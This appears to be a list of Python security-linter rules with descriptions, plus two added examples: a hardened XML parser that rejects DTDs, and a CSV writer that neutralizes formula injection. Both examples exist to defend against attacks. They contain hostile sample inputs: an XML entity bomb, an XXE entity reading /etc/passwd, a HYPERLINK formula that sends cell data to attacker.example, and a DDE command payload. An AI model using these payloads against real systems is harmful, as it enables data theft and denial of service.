dangerous-spawn-process
insecure-hash-algorithm-sha1
insecure-hash-algorithm-md5
dangerous-subinterpreters-run-string
  run_string. This is dangerous because it allows a malicious actor to run arbitrary Python code.
use-defused-xmlrpc
dangerous-interactive-code-run
dangerous-globals-use
dangerous-os-exec
use-defused-xml-parse
  xml library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data, and “XML bombs” (documents built from nested entity expansions) can cause denial of service. Do not use this library to parse untrusted input. Instead, the Python documentation recommends using defusedxml.
use-defused-xml
  defusedxml instead of xml, because the native Python xml library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and “XML bombs” can cause denial of service.
dangerous-subprocess-use
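The following is an added example for the two defusedxml rules above (use-defused-xml-parse and use-defused-xml); it is not code from the rule catalog, from the Python documentation or from the defusedxml project. It shows a constructed XML bomb being expanded by the standard-library xml.etree parser, and a stdlib-only hardened parser, built on xml.parsers.expat, that applies the policy defusedxml enforces with forbid_dtd=True: any DOCTYPE, entity declaration or external entity reference aborts the parse before a single entity can expand. The sample documents (BOMB, XXE, BENIGN) and the function names are this example's own; in production code use defusedxml itself rather than re-implementing it.

```python
"""Added example, not from the rule catalog or defusedxml: an XML bomb against
xml.etree, and a stdlib-only parser that refuses DTDs the way defusedxml's
forbid_dtd=True does. Sample documents below are constructed for the demo."""
import xml.etree.ElementTree as ET
import xml.parsers.expat

# Constructed XML bomb: each entity references the previous one ten times, so
# this ~250-byte document expands to 10**4 characters. A real "billion laughs"
# payload nests ten levels deep for 10**9 expansions.
BOMB = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE bomb [\n'
    '  <!ENTITY a "aaaaaaaaaa">\n'
    '  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">\n'
    '  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">\n'
    '  <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">\n'
    ']>\n'
    "<bomb>&d;</bomb>\n"
)

# Constructed XXE payload: an external entity that points at a local file.
XXE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE data [<!ENTITY secret SYSTEM "file:///etc/passwd">]>\n'
    "<data>&secret;</data>\n"
)

# Constructed benign document, the kind of input the application expects.
BENIGN = '<order id="42"><item sku="abc">2</item></order>'


def expanded_size_with_stdlib(doc):
    """Parse with xml.etree as-is and report how much text the entities produced."""
    root = ET.fromstring(doc)
    return len(root.text or "")


class UnsafeXMLError(ValueError):
    """Raised when untrusted XML contains a DTD, entity declaration or external reference."""


def parse_untrusted(doc):
    """Parse attacker-controlled XML into an Element, refusing DTD constructs.

    Uses the standard-library expat parser directly, because xml.etree's
    XMLParser exposes no hooks for DOCTYPE or entity events. Any DOCTYPE (and
    therefore any entity, internal or external) aborts the parse before
    expansion starts; the tree is assembled with xml.etree's TreeBuilder so
    callers get an ordinary Element back.
    """
    builder = ET.TreeBuilder()
    parser = xml.parsers.expat.ParserCreate()

    def forbid(*_args):
        # Raising inside an expat handler propagates out of Parse().
        raise UnsafeXMLError("DTD, entity or external reference in untrusted XML")

    parser.StartDoctypeDeclHandler = forbid
    parser.EntityDeclHandler = forbid
    parser.UnparsedEntityDeclHandler = forbid
    parser.ExternalEntityRefHandler = forbid
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(doc, True)
    return builder.close()


def is_accepted(doc):
    """True if parse_untrusted() accepts the document, False if it rejects it."""
    try:
        parse_untrusted(doc)
    except UnsafeXMLError:
        return False
    return True


if __name__ == "__main__":
    print("xml.etree expanded the bomb to", expanded_size_with_stdlib(BOMB), "characters")
    for name, doc in (("bomb", BOMB), ("xxe", XXE), ("benign", BENIGN)):
        print(name, "accepted" if is_accepted(doc) else "rejected")
```

Rejecting the DTD outright is the right default for data formats an application defines itself; it cannot be bypassed by encoding tricks because the decision is made by the same parser that would otherwise do the expansion, not by a regex over the raw bytes. Note that the amplification limits built into recent libexpat releases only kick in above a fixed output threshold, so a "small" bomb like the one above still expands in full under xml.etree.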
unverified-ssl-context
use-defusedcsv
  csv module. If user data is used to generate the data in this file, an attacker could inject a formula that executes when the CSV is imported into a spreadsheet application. Such a formula could steal data from the importing user or, at worst, install malware on the user's computer. defusedcsv is a drop-in replacement with the same API that mitigates formula injection. You can use defusedcsv instead of csv to safely generate CSVs.
dangerous-system-call
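The following is an added example for the use-defusedcsv rule above; it is not code from the rule catalog or from the defusedcsv project. It uses only the standard-library csv module to show the unmitigated output beside a neutralized one, applying the usual formula-injection mitigation (a leading apostrophe on any cell a spreadsheet would evaluate) that defusedcsv automates. The trigger set, the exemption for plain negative numbers, the helper names and the sample rows are this example's own assumptions, not a description of defusedcsv's exact behaviour.

```python
"""Added example, not from the rule catalog or defusedcsv: CSV formula injection
through the stdlib csv module, and a neutralizing writer. The trigger list and
the numeric exemption are this example's own choices; sample rows are constructed."""
import csv
import io
import re

# Leading characters that make Excel, LibreOffice and Google Sheets treat a
# cell as a formula (tab and CR are included because some importers strip
# leading whitespace before evaluating).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain decimal numbers legitimately start with "-"; leave those alone so the
# export still sorts and sums as numbers in the spreadsheet.
_PLAIN_NUMBER = re.compile(r"^-?\d+(\.\d+)?$")


def neutralize_cell(value):
    """Return `value` made safe for a spreadsheet import.

    Non-string values (ints, floats, None) cannot carry a formula and pass
    through unchanged. Strings beginning with a trigger character get a leading
    apostrophe, which spreadsheets show as literal text; strings that are just
    a negative number are exempted.
    """
    if not isinstance(value, str):
        return value
    if value.startswith(FORMULA_TRIGGERS) and not _PLAIN_NUMBER.match(value):
        return "'" + value
    return value


def write_csv(rows, safe=True):
    """Serialise rows to CSV text; with safe=True every cell is neutralized first."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row] if safe else row)
    return buf.getvalue()


# Constructed sample: the "comment" column was filled in by users through a web
# form. Row 2 carries a HYPERLINK formula that would exfiltrate the neighbouring
# cell when clicked; row 3 shows "@" as a trigger; row 4 shows a "-" prefixed
# cell with a DDE-style payload.
SAMPLE_ROWS = [
    ["user", "balance", "comment"],
    ["alice", -42.5, '=HYPERLINK("http://attacker.example/?c="&B2,"click")'],
    ["bob", "-7", "@SUM(1+1)"],
    ["carol", 3, "-2+3+cmd|' /C calc'!A0"],
]


if __name__ == "__main__":
    print("--- unmitigated ---")
    print(write_csv(SAMPLE_ROWS, safe=False))
    print("--- neutralized ---")
    print(write_csv(SAMPLE_ROWS))
```

In the neutralized output bob's balance "-7" stays a number while "@SUM(1+1)" becomes "'@SUM(1+1)". The apostrophe is the one mitigation that survives a round trip through every major spreadsheet, but it does change the stored text, so consumers that read the CSV programmatically rather than through a spreadsheet will see the extra character; decide per export which audience it is for.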
dangerous-testcapi-run-in-subinterp
  run_in_subinterp. This is dangerous because it allows a malicious actor to run arbitrary Python code.
insecure-hash-function